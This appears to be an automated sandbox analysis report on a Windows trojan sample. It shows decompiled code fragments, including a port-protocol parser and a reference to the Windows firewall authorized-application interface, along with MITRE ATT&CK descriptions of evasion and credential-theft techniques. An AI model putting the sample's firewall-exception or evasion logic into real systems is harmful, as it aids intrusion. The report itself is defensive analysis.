String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 1827900861-1951265404
Opcode ID: 1c2bd40102ae7d7afdc525c1cc241653f36dcd03ffe71dced80b41e39746a4d3
Instruction ID: 25fdc6133ddb8f5a47f36e776b20ca8cd89886f2110d6a8f7460e8b9189b0088
Opcode Fuzzy Hash: 1c2bd40102ae7d7afdc525c1cc241653f36dcd03ffe71dced80b41e39746a4d3
Instruction Fuzzy Hash: 3B41FA75A04208AFDB05DFE8C889CEEB7FAAF8D710B244455E601E7391DB75A981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000128F4, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E000128F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1dcb8);
				E00013F70(__ebx, __edi, __esi);
				_t31 = E0001339D(__ebx, __edi, _t35);
				_t15 =  *0x1f534; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00013C3D(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1f438; // 0xf21678
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1f010;
								if(__eflags != 0) {
									_push(_t33);
									E000154A0(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1f438; // 0xf21678
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1f438; // 0xf21678
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0001298F();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00012033(_t29, _t31, 0x20);
				}
				return E00013FB5(_t33);
			}

0x000128f4
0x000128f4
0x000128f4
0x000128f4
0x000128f6
0x000128fb
0x00012905
0x00012907
0x0001290f
0x00012930
0x00012936
0x0001293a
0x0001293d
0x00012940
0x00012946
0x00012948
0x0001294a
0x0001294d
0x00012953
0x00012955
0x00012957
0x0001295d
0x0001295f
0x00012960
0x00012965
0x0001295d
0x00012955
0x00012966
0x0001296b
0x0001296e
0x00012974
0x00012978
0x00012978
0x0001297e
0x00012985
0x00012917
0x00012917
0x00012917
0x0001291c
0x00012920
0x00012925
0x0001292d

APIs

__getptd.LIBCMT ref: 00012900

Part of subcall function 0001339D: __getptd_noexit.LIBCMT ref: 000133A0
Part of subcall function 0001339D: __amsg_exit.LIBCMT ref: 000133AD

__amsg_exit.LIBCMT ref: 00012920
__lock.LIBCMT ref: 00012930
InterlockedDecrement.KERNEL32(?), ref: 0001294D
InterlockedIncrement.KERNEL32(00F21678), ref: 00012978

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 88f150f50150b946d3b52e6fd1a5ddc4d5108d81e278fd0ada094ba1f865d953
Instruction ID: a1be0b7bed84242e82b238cc07f532c28b13c780f639b12ff56090259da0ed8c
Opcode Fuzzy Hash: 88f150f50150b946d3b52e6fd1a5ddc4d5108d81e278fd0ada094ba1f865d953
Instruction Fuzzy Hash: A1016132D01622EBE761AF5894057DEB7A0BF04760F044015E45477296C73CAAD1CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000154A0, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E000154A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x1de48);
				_t8 = E00013F70(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00013FB5(_t8);
				}
				if( *0x20a98 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x2093c, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E000138CA(_t32);
						 *_t10 = E00013888(GetLastError());
					}
					goto L9;
				}
				E00013C3D(__ebx, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00016520(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00016550();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E000154F6();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x000154a0
0x000154a2
0x000154a7
0x000154ac
0x000154b1
0x00015528
0x0001552d
0x0001552d
0x000154ba
0x000154ff
0x00015500
0x00015508
0x0001550e
0x00015510
0x00015512
0x00015525
0x00015527
0x00000000
0x00015510
0x000154be
0x000154c4
0x000154c9
0x000154cf
0x000154d4
0x000154d6
0x000154d7
0x000154d8
0x000154de
0x000154df
0x000154e6
0x000154ef
0x00000000
0x000154f1
0x000154f1
0x00000000
0x000154f1

APIs

__lock.LIBCMT ref: 000154BE

Part of subcall function 00013C3D: __mtinitlocknum.LIBCMT ref: 00013C53
Part of subcall function 00013C3D: __amsg_exit.LIBCMT ref: 00013C5F
Part of subcall function 00013C3D: EnterCriticalSection.KERNEL32(?,?,?,0001754D,00000004,0001DEC8,0000000C,00015589,00000000,?,00000000,00000000,00000000,?,0001334F,00000001), ref: 00013C67

___sbh_find_block.LIBCMT ref: 000154C9
___sbh_free_block.LIBCMT ref: 000154D8
HeapFree.KERNEL32(00000000,00000000,0001DE48,0000000C,00013C1E,00000000,0001DD68,0000000C,00013C58,00000000,?,?,0001754D,00000004,0001DEC8,0000000C), ref: 00015508
GetLastError.KERNEL32(?,0001754D,00000004,0001DEC8,0000000C,00015589,00000000,?,00000000,00000000,00000000,?,0001334F,00000001,00000214), ref: 00015519

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 846914ba509d1635827329e88f4c4244d92c7e2665f7e6de1cb0dae3c3a5d92f
Instruction ID: eadf8e03308372576c8a77c2ab0a0f9f9214857b9541d1b22dfd496764c9575a
Opcode Fuzzy Hash: 846914ba509d1635827329e88f4c4244d92c7e2665f7e6de1cb0dae3c3a5d92f
Instruction Fuzzy Hash: ED018671D01B05EBEB306BB49C0ABDE7AE59F40726F604019F504AE092DB3C8AC1CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00011071, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00011071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				void* _t25;

				_t25 = __edi;
				if(E00011C70(__edi, "udp") == 0) {
					if(E00011C70(__edi, "tcp") == 0) {
						if(E00011C70(__edi, "any") == 0) {
							goto L9;
						} else {
							 *__esi = 0x100;
							goto L6;
						}
					} else {
						 *__esi = 6;
						goto L6;
					}
				} else {
					 *__esi = 0x11;
					L6:
					if(E00011C70(_t25, ":") == 0) {
						L9:
						return 0;
					} else {
						_v8 = _v8 & 0x00000000;
						_t11 = E00011FD7(_t9 + 1,  &_v8, 0xa);
						if(_t11 == 0) {
							goto L9;
						} else {
							 *_a4 = _t11;
							return 1;
						}
					}
				}
			}

0x00011071
0x00011084
0x0001109d
0x000110b6
0x00000000
0x000110b8
0x000110b8
0x00000000
0x000110b8
0x0001109f
0x0001109f
0x00000000
0x0001109f
0x00011086
0x00011086
0x000110be
0x000110cd
0x000110f1
0x000110f4
0x000110cf
0x000110cf
0x000110db
0x000110e5
0x00000000
0x000110e7
0x000110ea
0x000110f0
0x000110f0
0x000110e5
0x000110cd

APIs

__wcstoui64.LIBCMT ref: 000110DB

Strings

tcp, xrefs: 0001108E
udp, xrefs: 00011075
any, xrefs: 000110A7

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcstoui64
String ID: any$tcp$udp
API String ID: 3882282163-1470427579
Opcode ID: 4c7b425f33759f6c33e949ead2e49da87854de64d3cbf18a5402c6967d37c322
Instruction ID: 8961925a80508ad83226f1ff2ff41aca28109bfc42e1fd6fd1cf4db9ae5f0b0d
Opcode Fuzzy Hash: 4c7b425f33759f6c33e949ead2e49da87854de64d3cbf18a5402c6967d37c322
Instruction Fuzzy Hash: 2A016776A4834666E72DAA20DD13BFA32D88F07764F20011DFB41D90C1EFF5D8C1965A

Uniqueness

Uniqueness Score: -1.00%

Function 00019110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00019110() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1d320;
					_v28 =  *0x1d318;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00019115
0x0001911d
0x00019134
0x000190e0
0x000190e9
0x000190f5
0x000190f8
0x000190fb
0x000190fd
0x00019100
0x00019105
0x0001910f
0x00019107
0x0001910b
0x0001910b
0x0001911f
0x00019125
0x0001912d
0x00000000
0x0001912f
0x0001912f
0x00019133
0x00019133
0x0001912d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,000184A4), ref: 00019115
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00019125

Strings

KERNEL32, xrefs: 00019110
IsProcessorFeaturePresent, xrefs: 0001911F

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: bad85f6674377a35144a03863057f81ca53a7d77a27b51286f1e485ddd177db4
Instruction ID: 1e1e90cfe9894e342e09efe13e6a2eec3b049915fb236ccd81c31f3c3c96baea
Opcode Fuzzy Hash: bad85f6674377a35144a03863057f81ca53a7d77a27b51286f1e485ddd177db4
Instruction Fuzzy Hash: 04F05B30A4060AE2EF101BE5AC1E6EFBBB9FB84745F860590E191B00C4DF74C1F4D242

Uniqueness

Uniqueness Score: -1.00%

Function 00018FFC, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00018FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E000188ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E000189DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00018F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00018E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00019001
0x00019007
0x0001907a
0x00000000
0x0001900e
0x0001900e
0x00019011
0x0001902c
0x0001902f
0x0001904f
0x00019061
0x00019031
0x00019031
0x00019034
0x00000000
0x00019036
0x00019048
0x00019048
0x00019034
0x0001907f
0x00019083
0x00019013
0x0001902b
0x0001902b
0x00019011

APIs

__cftof_l.LIBCMT ref: 00019022

Part of subcall function 00018E47: __fltout2.LIBCMT ref: 00018E73

__cftog_l.LIBCMT ref: 00019048
__cftoe_l.LIBCMT ref: 0001907A

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 33e99233196d266ea6894636570368ab3f1d98b9424263594c73411917182917
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: AA114B7200014ABFCF675E94CC15CEE3F67BB1C350B588519FA1859032C736DAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00013060, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00013060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x1dcf8);
				E00013F70(__ebx, __edi, __esi);
				_t28 = E0001339D(__ebx, __edi, _t30);
				_t13 =  *0x1f534; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00013C3D(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x1f618; // 0x1f540
					 *((intOrPtr*)(_t29 - 0x1c)) = E00013022(_t8, _t25, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E000130CA();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0001339D(_t22, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00012033(_t25, _t26, 0x20);
				}
				return E00013FB5(_t28);
			}

0x00013060
0x00013060
0x00013060
0x00013060
0x00013060
0x00013062
0x00013067
0x00013071
0x00013073
0x0001307b
0x0001309f
0x000130a1
0x000130a7
0x000130ab
0x000130ae
0x000130b9
0x000130bc
0x000130c3
0x0001307d
0x0001307d
0x00013081
0x00000000
0x00013083
0x00013088
0x00013088
0x00013081
0x0001308d
0x00013091
0x00013096
0x0001309e

APIs

__getptd.LIBCMT ref: 0001306C

Part of subcall function 0001339D: __getptd_noexit.LIBCMT ref: 000133A0
Part of subcall function 0001339D: __amsg_exit.LIBCMT ref: 000133AD

__getptd.LIBCMT ref: 00013083
__amsg_exit.LIBCMT ref: 00013091
__lock.LIBCMT ref: 000130A1

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 0f9731c89dc5294f687579bd0ffffdcf9169978088c7c1475568d2ba7aae471c
Instruction ID: 257c67c9b6c2154eb58f988dc56503b81732abb4199512a8fba1946425a8737a
Opcode Fuzzy Hash: 0f9731c89dc5294f687579bd0ffffdcf9169978088c7c1475568d2ba7aae471c
Instruction Fuzzy Hash: 24F01D32940701CAD762EB74940A7DDB3E06F04715F104559A5A49B2D3CBB85BC18B95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
